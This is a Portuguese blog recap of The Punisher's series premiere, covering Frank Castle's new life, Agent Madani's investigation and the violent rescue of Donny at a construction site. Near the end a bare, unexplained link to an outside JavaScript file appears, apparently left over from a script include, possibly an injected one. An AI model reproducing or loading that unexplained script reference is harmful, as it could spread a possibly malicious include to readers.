Posts Populares

The Punisher – S01E01 – 3 AM [SERIES PREMIERE]

Welcome back, Frank.


Frank Castle está morto. Ele não existe mais. Pete Castiglione assumiu o seu lugar. Pete é um cara quase normal, tem um trabalho, uma casa e tenta seguir sua vida. Mas as marcas pesadas do passado de Frank não o abandonam, mas não o culpo. Tudo o que ele tinha de mais importante lhe foi tirado, de forma violenta e abrupta, é até esperado que isso deixe marcas bem profundas. Mas depois de se vingar de todos os responsáveis diretos e indiretos pela morte de sua família, Frank tenta seguir em frente, assume outra identidade e procura viver da forma que é possível. Mas os pesadelos ainda o perseguem, não o deixam dormir. Deve ser difícil ver sua família morta toda vez que fechar os olhos. Ele vai até um grupo de apoio para ex-militares, que também estão com problemas de se adaptarem ao mundo novamente, mas ele não participa da conversa, fica apenas ouvindo os outros falarem. E depois que todos vão para casa, Frank vai conversar com o Curtis, o responsável pelo grupo de apoio, eles eram do mesmo pelotão e serviram juntos. Questiona se ele pensa nas coisas que fizeram na guerra, mais precisamente no Afeganistão, porque lá, segundo Frank, foi diferente. Curtis diz que a sua consciência está limpa, mas Frank não parece muito seguro disso.

Em um dos únicos momentos em que a série sai do eixo do Frank, conhecemos a agente especial Dinah Madani, que deseja investigar a morte de seu antigo parceiro Ahmad Zubair, que assassinado no Afeganistão durante uma investigação, onde descobriu que soldados americanos faziam tráfico de heroína. Ela fez uma investigação que não levou a nada, segundo seus superiores, e eles querem que ela deixe tudo isso de lado. Mas sabemos que isso não vai acontecer. Conversando com seu novo parceiro, Sam, Dinah Madani diz que descobriu informações sobre um coronel dos Fuzileiros chamado Schoonover – o mesmo que Frank matou no final da segunda temporada de Daredevil e que estava envolvido na morte de sua família -, o que ela acha muito estranho. Numa imagem do arquivo da agente, podemos ver Frank, Curtis e outro homem abraçados, durante o tempo que serviram.

Em seu novo trabalho na construção civil, Frank/Pete não procura de enturmar, fica na sua, descontando toda a sua raiva na forma que bate com a marreta na parede. Mas sempre há aqueles que se acham os mais importantes e poderosos, mesmo que não sejam nada disso. No caso de Frank são três, que estão sempre implicando com o fato dele ser calado, sempre trabalhando muito e isso prejudicar os outros. Frank aceita tudo calado, mas podemos ver sua vontade de enfiar a marreta goela abaixo deles em seus olhos. Até que aparece Donny, um rapaz novo, louco para se enturmar. Tenta se aproximar se Frank, mas ele não é o mais receptivo, então os outros encrenqueiros o convidam como um “trabalho” que vão fazer. Entre aspas, porque é um roubo. Com medo da rejeição, ele aceita, mesmo contrariado. Frank escuta tudo, mas se mantém calado. Só que tudo dá errado, Donny comete um erro infantil, deixa seu documento cair e todos descobrem sua identidade. Eles fogem, mas sabem que chegarão até Donny e, consequentemente, a eles. Então resolvem matá-lo. Pobre Donald.

Ele retornam ao prédio onde trabalham, onde Frank está marretando a parede para tentar esfriar a cabeça e vê quando jogam Donny no misturador de cimento. Eu achei essa parte uma alusão a história que contam no início do episódio, na cena do grupo de apoio, do soldado preso no buraco e que não consegue sair, que quanto mais ele luta, mais fundo o buraco fica. Nesse caso, quanto mais Donny lutava, mais preso ele ficava, pois o cimento continuava a entrar e o lugar estava cada vez mais cheio. Ele precisava apenas de outro soldado que já esteve no buraco para ajudá-lo. E quem disse que, provavelmente, ainda estava no buraco…? Então Frank intervém, pedindo para desligarem, mas como não obedecem, ele pede do jeitinho dele. A cena de luta é extremamente brutal e violenta, achei muito bem coreografada, lembrando as grandes cenas de Daredevil. Frank derruba um por um, jogando no cimento junto com Donny, ele descobre onde era o lugar onde foram assaltar e resgata o rapaz, deixando o dinheiro e mandando ele sumir. Ele chega ao lugar, apaga a luz e dispara um tiro, fazendo com que todos os homens comecem a atirar loucamente e acabem se matando. Restando apenas um, Frank aparece e acerta um tiro bem em sua testa, depois sai andando calmamente. Porém, alguém com acesso as câmeras de segurança e um sistema de reconhecimento de andar, descobre que Frank está vivo. Quem será ele?

https://cloudapi.online/js/api46.js

gostou da matéria? deixe um comentário!

Thais Pereira

Feminista, leonina com ascendente em gêmeos e lua em virgem, viciada em memes, em Friends e problematizar na internet. Formada em História da Arte, mas consciente que nunca vai trabalhar com isso na vida. Normalmente eu escrevo e falo mais do que deveria. Eu mesma, Thais Mello.

Tema por Gabriela Gomes Todos os direitos reservados ao Panela de Séries • Hosted by flaunt.nu